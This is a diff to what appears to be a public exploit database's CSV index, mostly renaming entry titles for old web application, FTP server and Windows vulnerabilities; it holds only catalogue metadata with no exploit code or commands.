Denial Of Service",2011-01-19,"Craig Freyman",windows,dos,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0 -35246,platforms/php/webapps/35246.py,"Joomla! Component HD FLV Player < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 +35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35293,platforms/php/webapps/35293.txt,"Joomla! Component VirtueMart eCommerce 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0 35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 @@ -32305,7 +32305,7 @@ id,file,description,date,author,platform,type,port 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 -35752,platforms/php/webapps/35752.txt,"Mambo - 'com_docman' 1.3.0 Component Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service",2011-05-16,Knud,multiple,dos,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 @@ -32358,7 +32358,7 @@ id,file,description,date,author,platform,type,port 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 -35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 +35808,platforms/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 @@ -32438,7 +32438,7 @@ id,file,description,date,author,platform,type,port 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 -35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 +35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous ",hardware,remote,0 @@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 +35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 @@ -32609,13 +32609,13 @@ id,file,description,date,author,platform,type,port 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 -36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0 +36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow",2015-02-14,R-73eN,windows,remote,0 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 -36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 +36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 @@ -32625,21 +32625,21 @@ id,file,description,date,author,platform,type,port 36092,platforms/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0 -36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 +36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 -36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 +36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow (Metasploit)",2015-02-17,Metasploit,windows,remote,0 36101,platforms/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)",2015-02-17,Metasploit,java,remote,1617 -36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36103,platforms/php/webapps/36103.txt,"Mambo Component 'com_ahsshop' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH)",2015-02-18,"Andrew Smith",windows,local,0 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 -36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 -36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 @@ -32695,7 +32695,7 @@ id,file,description,date,author,platform,type,port 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 -36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 +36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! Component com_biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 @@ -32803,7 +32803,7 @@ id,file,description,date,author,platform,type,port 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 -36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 +36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 @@ -32894,7 +32894,7 @@ id,file,description,date,author,platform,type,port 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 -36373,platforms/php/webapps/36373.txt,"Joomla! Component Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 +36373,platforms/php/webapps/36373.txt,"Joomla! Component 'com_simplephotogallery' 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 @@ -32906,7 +32906,7 @@ id,file,description,date,author,platform,type,port 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36385,platforms/php/webapps/36385.txt,"Joomla! Component Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 +36385,platforms/php/webapps/36385.txt,"Joomla! Component 'com_simplephotogallery' 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0 @@ -32960,7 +32960,7 @@ id,file,description,date,author,platform,type,port 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,php,remote,80 -36439,platforms/php/webapps/36439.txt,"Joomla! Plugin eCommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 +36439,platforms/php/webapps/36439.txt,"Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 @@ -32985,7 +32985,7 @@ id,file,description,date,author,platform,type,port 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 -36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 +36464,platforms/php/webapps/36464.txt,"Joomla! Component 'com_spiderfaq' - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 @@ -33070,8 +33070,8 @@ id,file,description,date,author,platform,type,port 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36747,platforms/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 -36560,platforms/php/webapps/36560.txt,"Joomla! Component Gallery WD - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 -36561,platforms/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 +36560,platforms/php/webapps/36560.txt,"Joomla! Component 'com_gallery_wd' - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 +36561,platforms/php/webapps/36561.txt,"Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0 36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Privilege Escalation (PoC)",2015-03-30,"Sebastian Krahmer",linux,local,0 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 @@ -33110,7 +33110,7 @@ id,file,description,date,author,platform,type,port 36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 -36601,platforms/php/webapps/36601.txt,"Joomla! Component Spider Random Article - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 +36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36620,platforms/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"WebGate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33812,7 +33812,7 @@ id,file,description,date,author,platform,type,port 37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80 -37364,platforms/php/webapps/37364.txt,"Joomla! Component SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 +37364,platforms/php/webapps/37364.txt,"Joomla! Component 'com_simpleimageupload' - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)",2015-06-24,Metasploit,windows,local,0 @@ -34051,7 +34051,7 @@ id,file,description,date,author,platform,type,port 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 -37620,platforms/php/webapps/37620.txt,"Joomla! Component DOCman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 +37620,platforms/php/webapps/37620.txt,"Joomla! Component 'com_docman' - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 @@ -34091,7 +34091,7 @@ id,file,description,date,author,platform,type,port 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",ios,dos,0 37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37663,platforms/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 -37666,platforms/php/webapps/37666.txt,"Joomla! Plugin Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 +37666,platforms/php/webapps/37666.txt,"Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos,0 @@ -34156,7 +34156,7 @@ id,file,description,date,author,platform,type,port 37728,platforms/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,dos,0 37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote,0 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0 -37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 +37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 @@ -34190,14 +34190,14 @@ id,file,description,date,author,platform,type,port 37764,platforms/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 -37767,platforms/multiple/webapps/37767.txt,"Joomla! Component Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 +37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 